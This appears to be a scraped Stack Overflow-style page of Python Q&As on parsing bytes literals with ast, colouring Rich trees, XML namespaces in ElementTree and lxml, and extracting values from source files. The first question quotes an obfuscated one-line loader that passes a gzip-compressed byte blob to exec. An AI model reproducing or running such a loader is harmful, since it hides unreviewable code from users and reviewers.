I'm trying to parse python snippets, some of which contains bytestrings.
for example:
"""
from gzip import decompress as __;_=exec;_(__(b'\x1f\x8b\x08\x00\xcbYmc\x02\xff\xbd7i\xb3\xdaJv\xdf\xdf\xaf /I\xf9\xbar\xc6%\x81#\x92k\x9c)\x16I,b\x95Xm\x87\x92Z-$\xd0\x86\x16\x10LM~{N\x03\xd7\xc6\xd7\x9e%\xa9\xa9PE/\xa7\xcf\xbeuk\xd3\xacm\xdd"\x94\x1b\'\xa5\xda\x04"H\x17\xae\xe3t\xf4\xcdn\x03\xa9/&T>\x13\xdbu\g=\x9f\x13~\x11\xf6\x9b\xd7\x15~\xb2\xe7\xbc\xe6\xc2K\xb8\x18\x03\xfd|[\x7f\xe8\xb8I;\xf0\xf1\x93\xec\x83\x8eo15\x8dC\xfc\xc6I\xf1\xfd\xf5r\x8f\xeb\x0f\xd7\xc53#\xa8<_\xb2Py\xbe\xe1\xde\xff\x0fk&\x93\xa8V\x18\x00\x00'))
x = b"\x1f\x8b\x08"
y = "hello world"
"""
Is there a regex pattern I can use to correctly find those strings?
I have tried implementing a regex query myself, like so:
bytestrings= re.findall(r'b"(.+?)"', text) + re.findall(r"b\'(.+?)'", text)
I was expecting to receive an array
[b'\x1f\x8b\x08\x00\xcbYmc\x02\xff\xbd7i\xb3\xdaJv\xdf\xdf\xaf /I\xf9\xbar\xc6%\x81#\x92k\x9c)\x16I,b\x95Xm\x87\x92Z-$\xd0\x86\x16\x10LM~{N\x03\xd7\xc6\xd7\x9e%\xa9\xa9PE/\xa7\xcf\xbeuk\xd3\xacm\xdd"\x94\x1b\'\xa5\xda\x04"H\x17\xae\xe3t\xf4\xcdn\x03\xa9/&T>\x13\xdbu\g=\x9f\x13~\x11\xf6\x9b\xd7\x15~\xb2\xe7\xbc\xe6\xc2K\xb8\x18\x03\xfd|[\x7f\xe8\xb8I;\xf0\xf1\x93\xec\x83\x8eo15\x8dC\xfc\xc6I\xf1\xfd\xf5r\x8f\xeb\x0f\xd7\xc53#\xa8<_\xb2Py\xbe\xe1\xde\xff\x0fk&\x93\xa8V\x18\x00\x00', b"\x1f\x8b\x08"]
instead it returns an empty array.
This isn't a job for regular expressions, but for a Python parser.
import ast
code = """
...
"""
tree = ast.parse(code)
Now you can walk the tree looking for values of type ast.Constant whose value attributes have type bytes. Do this by defining a subclass of ast.NodeVisitor and overriding its visit_Constant method. This method will be called on each node of type ast.Constant in the tree, letting you examine the value. Here, we simply add appropriate values to a global list.
bytes_literals = []
class BytesLiteralCollector(ast.NodeVisitor):
def visit_Constant(self, node):
if isinstance(node.value, bytes):
bytes_literals.append(node.value)
BytesLiteralCollector().visit(tree)
The documentation for NodeVisitor is not great. Aside from the two documented methods visit and generic_visit, I believe you can define visit_* where * can be any of the node types defined in the abstract grammar presented at the start of the documentation.
You can use print(ast.dump(ast.parse(code), indent=4)) to get a more-or-less readable representation of the tree that your visitor will walk.
Related
Im building some trees within Rich. However Im outputting obj repr() and also Python object details that Rich only seems to want to display if I pass the data to the tree branch as a string. i.e.
tree = Tree(str(type(root_obj)))
My question is this out can i colourize the output of my tree in Rich. For example if I pass a type to the tree without casting it to a string I get:
tree = Tree(type(root_obj))
...
rich.errors.NotRenderableError: Unable to render <class 'nornir.core.task.AggregatedResult'>; A str, Segment or object with __rich_console__ method is required
But not sure what console method to use here. Any help would be great. Thanks.
You can highlight text via a Rich highlighter. The ReprHighlighter will highlight the strings produces from most objects. Import it like this:
from rich.highlighter import ReprHighlighter
highlighter = ReprHighlighter()
Now you can highlight strings in the following way:
tree = Tree(highlighter(str(root_obj)))
Alternatively, you can use Rich's pretty printing capabilities via the rich.pretty.Pretty class:
from rich.pretty import Pretty
tree = Tree(Pretty(rich_obj))
I'm a total noob in coding, I study IT, and have a school project in which I must convert a .txt file in a XML file. I have managed to create a tree, and subelements, but a must put some XML namespace in the code. Because the XML file in the end must been opened in a program that gives you a table of the informations, and something more. But without the scheme from the XML namespace it won't open anything. Can someone help me in how to put a .xsd in my code?
This is the scheme:
http://www.pufbih.ba/images/stories/epp_docs/PaketniUvozObrazaca_V1_0.xsd
Example of XML file a must create:
http://www.pufbih.ba/images/stories/epp_docs/4200575050089_1022.xml
And in the first row a have the scheme that I must input: "urn:PaketniUvozObrazaca_V1_0.xsd"
This is the code a created so far:
import xml.etree.ElementTree as xml
def GenerateXML(GIP1022):
root=xml.Element("PaketniUvozObrazaca")
p1=xml.Element("PodaciOPoslodavcu")
root.append(p1)
jib=xml.SubElement(p1,"JIBPoslodavca")
jib.text="4254160150005"
pos=xml.SubElement(p1,"NazivPoslodavca")
pos.text="MOJATVRTKA d.o.o. ORAŠJE"
zah=xml.SubElement(p1,"BrojZahtjeva")
zah.text="8"
datz=xml.SubElement(p1,"DatumPodnosenja")
datz.text="2021-01-01"
tree=xml.ElementTree(root)
with open(GIP1022,"wb") as files:
tree.write(files)
if __name__=="__main__":
GenerateXML("primjer.xml")
The official documentation is not super explicit as to how one works with namespaces in ElementTree, but the core of it is that ElementTree takes a very fundamental(ist) approach: instead of manipulating namespace prefixes / aliases, elementtree uses Clark's Notation.
So e.g.
<bar xmlns="foo">
or
<x:bar xmlns:x="foo">
(the element bar in the foo namespace) would be written
{foo}bar
>>> tostring(Element('{foo}bar'), encoding='unicode')
'<ns0:bar xmlns:ns0="foo" />'
alternatively (and sometimes more conveniently for authoring and manipulating) you can use QName objects which can either take a Clark's notation tag name, or separately take a namespace and a tag name:
>>> tostring(Element(QName('foo', 'bar')), encoding='unicode')
'<ns0:bar xmlns:ns0="foo" />'
So while ElementTree doesn't have a namespace object per-se you can create namespaced object like this, probably via a helper partially applying QName:
>>> root = Element(ns("PaketniUvozObrazaca"))
>>> SubElement(root, ns("PodaciOPoslodavcu"))
<Element <QName '{urn:PaketniUvozObrazaca_V1_0.xsd}PodaciOPoslodavcu'> at 0x7f502481bdb0>
>>> tostring(root, encoding='unicode')
'<ns0:PaketniUvozObrazaca xmlns:ns0="urn:PaketniUvozObrazaca_V1_0.xsd"><ns0:PodaciOPoslodavcu /></ns0:PaketniUvozObrazaca>'
Now there are a few important considerations here:
First, as you can see the prefix when serialising is arbitrary, this is in keeping with ElementTree's fundamentalist approach to XML (the prefix should not matter), but it has since grown a "register_namespace" global function which allows registering specific prefixes:
>>> register_namespace('xxx', 'urn:PaketniUvozObrazaca_V1_0.xsd')
>>> tostring(root, encoding='unicode')
'<xxx:PaketniUvozObrazaca xmlns:xxx="urn:PaketniUvozObrazaca_V1_0.xsd"><xxx:PodaciOPoslodavcu /></xxx:PaketniUvozObrazaca>'
you can also pass a single default_namespace to (some) serialization function to specify the, well, default namespace:
>>> tostring(root, encoding='unicode', default_namespace='urn:PaketniUvozObrazaca_V1_0.xsd')
'<PaketniUvozObrazaca xmlns="urn:PaketniUvozObrazaca_V1_0.xsd"><PodaciOPoslodavcu /></PaketniUvozObrazaca>'
A second, possibly larger, issue is that ElementTree does not support validation.
The Python standard library does not provide support for any validating parser or tree builder, whether DTD, rng, xml schema, anything. Not by default, and not optionally.
lxml is probably the main alternative supporting validation (of multiple types of schema), its core API follows ElementTree but extends it in multiple ways and directions (including much more precise namespace prefix support, and prefix round-tripping). But even then the validation is (AFAIK) mostly explicit, at least when generating / serializing documents.
What you want is to add a default namespace declaration (xmlns="urn:PaketniUvozObrazaca_V1_0.xsd") to the root element. I have edited the code in the question to show you how this can be done.
import xml.etree.ElementTree as ET
def GenerateXML(GIP1022):
# Create the PaketniUvozObrazaca root element in the urn:PaketniUvozObrazaca_V1_0.xsd namespace
root = ET.Element("{urn:PaketniUvozObrazaca_V1_0.xsd}PaketniUvozObrazaca")
# Add subelements
p1 = ET.Element("PodaciOPoslodavcu")
root.append(p1)
jib = ET.SubElement(p1,"JIBPoslodavca")
jib.text = "4254160150005"
pos = ET.SubElement(p1,"NazivPoslodavca")
pos.text = "MOJATVRTKA d.o.o. ORAŠJE"
zah = ET.SubElement(p1,"BrojZahtjeva")
zah.text = "8"
datz = ET.SubElement(p1,"DatumPodnosenja")
datz.text = "2021-01-01"
# Make urn:PaketniUvozObrazaca_V1_0.xsd the default namespace (no prefix)
ET.register_namespace("", "urn:PaketniUvozObrazaca_V1_0.xsd")
# Prettify output (requires Python 3.9)
ET.indent(root)
tree = ET.ElementTree(root)
with open(GIP1022,"wb") as files:
tree.write(files)
if __name__=="__main__":
GenerateXML("primjer.xml")
Contents of primjer.xml:
<PaketniUvozObrazaca xmlns="urn:PaketniUvozObrazaca_V1_0.xsd">
<PodaciOPoslodavcu>
<JIBPoslodavca>4254160150005</JIBPoslodavca>
<NazivPoslodavca>MOJATVRTKA d.o.o. ORAŠJE</NazivPoslodavca>
<BrojZahtjeva>8</BrojZahtjeva>
<DatumPodnosenja>2021-01-01</DatumPodnosenja>
</PodaciOPoslodavcu>
</PaketniUvozObrazaca>
Note that only the root element is explicitly bound to a namespace in the code. The subelements do not need to be in a namespace when they are added. The end result is an XML document (primjer.xml) where all elements belong to the same default namespace.
The above is not the only way to create an element in a namespace. For example, instead of the {namespace-uri}name notation, the QName class can be used. See https://stackoverflow.com/a/58678592/407651.
The tree.write() method takes a default_namespace argument.
What happens if you change that line to the following?
tree.write(files, default_namespace="urn:PaketniUvozObrazaca_V1_0.xsd")
I am trying to create an XML export from a python application and need to structure the file in a specific way for the external recipient of the file.
The root node needs to be namespaced, but the child nodes should not.
The root node of should look like this:
<ns0:SalesInvoice_Custom_Xml xmlns:ns0="http://EDI-export/Invoice">...</ns0:SalesInvoice_Custom_Xml>
I have tried to generate the same node using the lxml library on Python 2.7, but it does not behave as expected.
Here is the code that should generate the root node:
def create_edi(self, document):
_logger.info("INFO: Started creating EDI invoice with invoice number %s", document.number)
rootNs = etree.QName("ns0", "SalesInvoice_Custom_Xml")
doc = etree.Element(rootNs, nsmap={
'ns0': "http://EDI-export/Invoice"
})
This gives the following output
<ns1:SalesInvoice_Custom_Xml xmlns:ns0="http://EDI-export/Invoice" xmlns:ns1="ns0">...</ns1:SalesInvoice_Custom_Xml>
What should I change in my code to get lxml to generate the correct root node
You need to use
rootNs = etree.QName(ns0, "SalesInvoice_Custom_Xml")
with
ns0 = "http://EDI-export/Invoice"
The whole data structure itself is agnostic of any namespace mapping you might apply later, i. e. the tags know the true namespaces (e. g. http://EDI-export/Invoice) not their mapping (e. g. ns0).
Later, when you finally serialize this into a string, a namespace mapping is needed. Then (and only then) a namespace mapping will be used.
Also, after parsing you can ask the etree object what namespace mapping had been found during parsing. But that is not part of the structure, it is just additional information about how the structure had been encoded as string. Consider that the following two XMLs are logically equal:
<x:tag xmlns:x="namespace"></x:tag>
and
<y:tag xmlns:y="namespace"></y:tag>
After parsing, their structures will be equal, their namespace mappings will not.
When I print this I get:
FuncA
FuncB
FuncC
When really what I want is:
['FuncA', 'FuncB', 'FuncC']
How would I be able to iterate through my returned values and add them to the list?
Rather than manually look for text (which can easily lead to false positives), use the ast module to build an abstract syntax tree, then extract function names with that:
import ast
functions = []
with open( 'codefile.py', 'r') as file:
tree = ast.parse(file.read(), 'codefile.py')
for node in ast.walk(tree):
if isinstance(node, ast.FunctionDef):
functions.append(node.name)
print(functions)
This finds all function objects anywhere in the source code, just like your search for def text would have. Except this skips commented out code or the word def in a string literal, for instance.
I have a file in gran/config.py AND I cannot import this file (not an option).
Inside this config.py, there is the following code
...<more code>
animal = dict(
bear = r'^bear4x',
tiger = r'^.*\tiger\b.*$'
)
...<more code>
I want to be able parse r'^bear4x' or r'^.*\tiger\b.*$' based on bear or tiger.
I started out with
try:
text = open('gran/config.py','r')
tline = filter('not sure', text.readlines())
text.close()
except IOError, str:
pass
I was hoping to grab the whole animal dict by
grab = re.compile("^animal\s*=\s*('.*')") or something like that
and maybe change tline to tline = filter(grab.search,text.readlines())
but it only grabs animal = dict( and not the following lines of dict.
how can i grab multiple lines?
look for animal then confirm the first '(' then continue to look until ')' ??
Note: the size of animal dict may change so anything static approach (like grab 4 extra lines after animal is found) wouldnt work
Maybe you should try some AST hacks? With python it is easy, just:
import ast
config= ast.parse( file('config.py').read() )
So know you have your parsed module. You need to extract assign to animals and evaluate it. There are safe ast.literal_eval function but since we make a call to dict it wont work here. The idea is to traverse whole module tree leaving only assigns and run it localy:
class OnlyAssings(ast.NodeTransformer):
def generic_visit( self, node ):
return None #throw other things away
def visit_Module( self, node ):
#We need to visit Module and pass it
return ast.NodeTransformer.generic_visit( self, node )
def visit_Assign(self, node):
if node.targets[0].id == 'animals': # this you may want to change
return node #pass it
return None # throw away
config= OnlyAssings().visit(config)
Compile it and run:
exec( compile(config,'config.py','exec') )
print animals
If animals should be in some dictionary, pass it as a local to exec:
data={}
exec( compile(config,'config.py','exec'), globals(), data )
print data['animals']
There is much more you can do with ast hacking, like visit all If and For statement or much more. You need to check documentation.
If the only reason you can't import that file as-is is because of imports that will fail otherwise, you can potentially hack your way around it than trying to process a perfectly good Python file as just text.
For example, if I have a file named busted_import.py with:
import doesnotexist
foo = 'imported!'
And I try to import it, I will get an ImportError. But if I define what the doesnotexist module refers to using sys.modules before trying to import it, the import will succeed:
>>> import sys
>>> sys.modules['doesnotexist'] = ""
>>> import busted_import
>>> busted_import.foo
'imported!'
So if you can just isolate the imports that will fail in your Python file and redefine those prior to attempting an import, you can work around the ImportErrors
I am not getting what exactly are you trying to do.
If you want to process each line with regular expression - you have ^ in regular expression re.compile("^animal\s*=\s*('.*')"). It matches only when animal is at the start of line, not after some spaces. Also of course it does not match bear or tiger - use something like re.compile("^\s*([a-z]+)\s*=\s*('.*')").
If you want to process multiple lines with single regular expression,
read about re.DOTALL and re.MULTILINE and how they affect matching newline characters:
http://docs.python.org/2/library/re.html#re.MULTILINE
Also note that text.readlines() reads lines, so the filter function in filter('not sure', text.readlines()) is run on each line, not on whole file. You cannot pass regular expression in this filter(<re here>, text.readlines()) and hope it will match multiple lines.
BTW processing Python files (and HTML, XML, JSON... files) using regular expressions is not wise. For every regular expression you write there are cases where it will not work. Use parser designed for given format - for Python source code it's ast. But for your use case ast is too complex.
Maybe it would be better to use classic config files and configparser. More structured data like lists and dicts can be easily stored in JSON or YAML files.